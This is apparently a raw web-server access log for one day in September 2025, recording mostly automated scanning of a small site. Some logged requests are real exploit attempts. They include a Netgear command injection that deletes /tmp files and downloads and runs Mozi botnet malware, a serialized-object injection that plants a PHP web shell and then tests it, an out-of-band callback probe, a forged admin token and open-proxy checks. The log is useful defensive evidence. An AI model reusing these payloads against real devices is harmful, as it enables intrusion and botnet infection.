84.19.89.42 - - [18/Sep/2025:00:10:08 +0200] "GET / HTTP/1.1" 200 1895 165.22.50.233 - - [18/Sep/2025:00:28:12 +0200] "-" 400 1930 165.22.50.233 - - [18/Sep/2025:00:28:12 +0200] "GET /cdn-cgi/trace HTTP/1.1" 404 735 196.251.89.45 - - [18/Sep/2025:01:22:31 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 131.161.128.119 - - [18/Sep/2025:01:26:43 +0200] "GET / HTTP/1.0" 200 1895 44.212.75.162 - - [18/Sep/2025:01:33:16 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.120 - - [18/Sep/2025:01:48:44 +0200] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [18/Sep/2025:02:39:36 +0200] "GET /login HTTP/1.1" 404 723 176.65.149.162 - - [18/Sep/2025:03:01:37 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.38.44.221 - - [18/Sep/2025:03:21:54 +0200] "GET /login HTTP/1.1" 404 723 64.62.156.162 - - [18/Sep/2025:05:33:57 +0200] "-" 400 1930 45.38.44.221 - - [18/Sep/2025:06:25:05 +0200] "GET /login HTTP/1.1" 404 723 66.132.153.50 - - [18/Sep/2025:06:45:22 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.50 - - [18/Sep/2025:06:45:25 +0200] "GET / HTTP/1.1" 200 1895 66.132.153.50 - - [18/Sep/2025:06:45:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.50 - - [18/Sep/2025:06:45:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.50 - - [18/Sep/2025:06:45:29 +0200] "GET /wiki HTTP/1.1" 404 722 146.190.48.172 - - [18/Sep/2025:06:46:39 +0200] "GET /aaa9 HTTP/1.1" 404 722 146.190.48.172 - - [18/Sep/2025:06:46:46 +0200] "GET /aab8 HTTP/1.1" 404 722 146.190.48.172 - - [18/Sep/2025:06:46:51 +0200] "GET / HTTP/1.1" 200 1895 176.65.148.99 - - [18/Sep/2025:06:50:35 +0200] "POST /login HTTP/1.1" 404 723 176.65.149.162 - - [18/Sep/2025:07:19:44 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 18.97.5.45 - - [18/Sep/2025:08:02:34 +0200] "GET / HTTP/1.1" 200 1895 68.183.207.2 - - [18/Sep/2025:09:05:16 +0200] "GET / HTTP/1.1" 200 1895 68.183.207.2 - - [18/Sep/2025:09:05:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.95.147.173 - - [18/Sep/2025:09:12:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 18.97.19.201 - - [18/Sep/2025:09:21:49 +0200] "GET / HTTP/1.1" 200 1895 194.165.16.71 - - [18/Sep/2025:09:30:43 +0200] "POST / HTTP/1.1" 200 1895 198.235.24.127 - - [18/Sep/2025:09:35:13 +0200] "-" 400 1930 198.235.24.127 - - [18/Sep/2025:09:35:14 +0200] "-" 400 1930 196.251.86.125 - - [18/Sep/2025:09:37:03 +0200] "GET /login HTTP/1.1" 404 723 194.165.16.71 - - [18/Sep/2025:09:39:00 +0200] "GET /api/fabric/device/status HTTP/1.1" 404 754 3.130.96.91 - - [18/Sep/2025:10:08:45 +0200] "GET / HTTP/1.1" 200 1895 3.130.96.91 - - [18/Sep/2025:10:11:37 +0200] "GET / HTTP/1.1" 200 1895 3.130.96.91 - - [18/Sep/2025:10:14:44 +0200] "-" 400 1930 3.130.96.91 - - [18/Sep/2025:10:17:14 +0200] "-" 400 1930 3.130.96.91 - - [18/Sep/2025:10:19:31 +0200] "-" 400 1930 196.251.69.205 - - [18/Sep/2025:10:37:41 +0200] "-" 400 1930 123.200.15.222 - - [18/Sep/2025:11:13:09 +0200] "GET / HTTP/1.1" 200 1895 138.68.174.198 - - [18/Sep/2025:11:19:42 +0200] "GET / HTTP/1.1" 200 1895 138.68.174.198 - - [18/Sep/2025:11:19:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 194.165.16.71 - - [18/Sep/2025:11:42:08 +0200] "GET /login.php?authorized=eyJ1c2VyIjogeyJuYW1lIjogImFkbWluIiwgImxvZ2luIjogImFkbWluIn0sInJvbGUiOnsibmFtZSI6ImFkbWluaXN0cmF0b3IiLCAicmVzdHJpY3Rpb25zIjogW10sImRlbGV0ZWFibGUiOiBmYWxzZX19 HTTP/1.1" 404 727 194.165.16.71 - - [18/Sep/2025:11:42:08 +0200] "GET /v.1.5/php/features/feature-transfer-export.php?action=id;&filename&varid&slot HTTP/1.1" 404 776 103.158.174.70 - - [18/Sep/2025:12:14:59 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 91.238.181.96 - - [18/Sep/2025:13:02:11 +0200] "-" 400 1930 65.49.1.66 - - [18/Sep/2025:13:41:44 +0200] "GET / HTTP/1.1" 200 1895 65.49.1.79 - - [18/Sep/2025:13:42:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 65.49.1.68 - - [18/Sep/2025:13:42:44 +0200] "GET /?format=json HTTP/1.1" 200 1895 65.49.1.77 - - [18/Sep/2025:13:42:57 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 65.49.1.66 - - [18/Sep/2025:13:43:10 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 45.135.193.100 - - [18/Sep/2025:13:59:21 +0200] "GET / HTTP/1.1" 200 1895 165.22.139.16 - - [18/Sep/2025:14:03:37 +0200] "-" 400 1930 165.22.139.16 - - [18/Sep/2025:14:03:37 +0200] "-" 400 1930 165.22.139.16 - - [18/Sep/2025:14:03:37 +0200] "GET / HTTP/1.1" 200 1895 165.22.139.16 - - [18/Sep/2025:14:03:38 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 165.22.139.16 - - [18/Sep/2025:14:03:38 +0200] "GET /get.php HTTP/1.1" 404 725 45.235.152.83 - - [18/Sep/2025:15:56:51 +0200] "GET / HTTP/1.1" 200 1895 45.135.193.100 - - [18/Sep/2025:16:09:40 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.41 - - [18/Sep/2025:17:16:59 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.41 - - [18/Sep/2025:17:17:02 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.41 - - [18/Sep/2025:17:17:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.41 - - [18/Sep/2025:17:17:06 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.41 - - [18/Sep/2025:17:17:06 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 176.65.149.162 - - [18/Sep/2025:17:28:38 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 44.220.185.49 - - [18/Sep/2025:17:30:45 +0200] "GET / HTTP/1.1" 200 1895 45.135.193.100 - - [18/Sep/2025:18:30:54 +0200] "GET / HTTP/1.1" 200 1895 18.97.5.21 - - [18/Sep/2025:18:41:40 +0200] "GET / HTTP/1.1" 200 1895 196.251.86.125 - - [18/Sep/2025:18:42:02 +0200] "GET /login HTTP/1.1" 404 723 103.168.2.226 - - [18/Sep/2025:19:01:15 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 132.255.211.243 - - [18/Sep/2025:20:34:26 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 5.253.86.21 - - [18/Sep/2025:20:36:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 196.251.89.45 - - [18/Sep/2025:20:39:38 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 78.110.149.67 - - [18/Sep/2025:21:02:30 +0200] "GET / HTTP/1.1" 200 1895 194.165.16.11 - - [18/Sep/2025:21:03:24 +0200] "GET /API/regionsDiscovery.php?master=spark%3A%2F%2Fd364oin49vd0aja1b9j0atpp6xzrrga8t.oast.pro:443&mask=26&project=your_project&devices=device1%2Cdevice2&mtserver=127.0.0.1%3A3306&mtuser=root&mtpassword=paloalto&task-id=1193&mode=pre-analysis®ions&parquetPath=%2Ftmp&timezone=Europe%2FHelsinki&mlserver=127.0.0.1&debug=false&initDate=2023-01-01&endDate=2023-01-31 HTTP/1.1" 404 746 194.165.16.11 - - [18/Sep/2025:21:29:26 +0200] "POST /loginok.html HTTP/1.1" 404 730 194.165.16.11 - - [18/Sep/2025:21:29:27 +0200] "GET /dir.html HTTP/1.1" 404 726 185.180.140.112 - - [18/Sep/2025:21:46:05 +0200] "GET / HTTP/1.1" 200 1895 194.165.16.11 - - [18/Sep/2025:21:48:57 +0200] "GET /wizard/wiz.upload.php HTTP/1.1" 404 743 194.165.16.11 - - [18/Sep/2025:21:48:58 +0200] "GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4=+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D HTTP/1.1" 404 752 194.165.16.11 - - [18/Sep/2025:21:48:59 +0200] "GET /wizard/wiz.upload.php?cmd=id HTTP/1.1" 404 743 157.245.152.217 - - [18/Sep/2025:22:03:49 +0200] "-" 400 1930 157.245.152.217 - - [18/Sep/2025:22:03:49 +0200] "GET /cdn-cgi/trace HTTP/1.1" 404 735 181.193.81.190 - - [18/Sep/2025:22:29:21 +0200] "GET / HTTP/1.1" 200 1895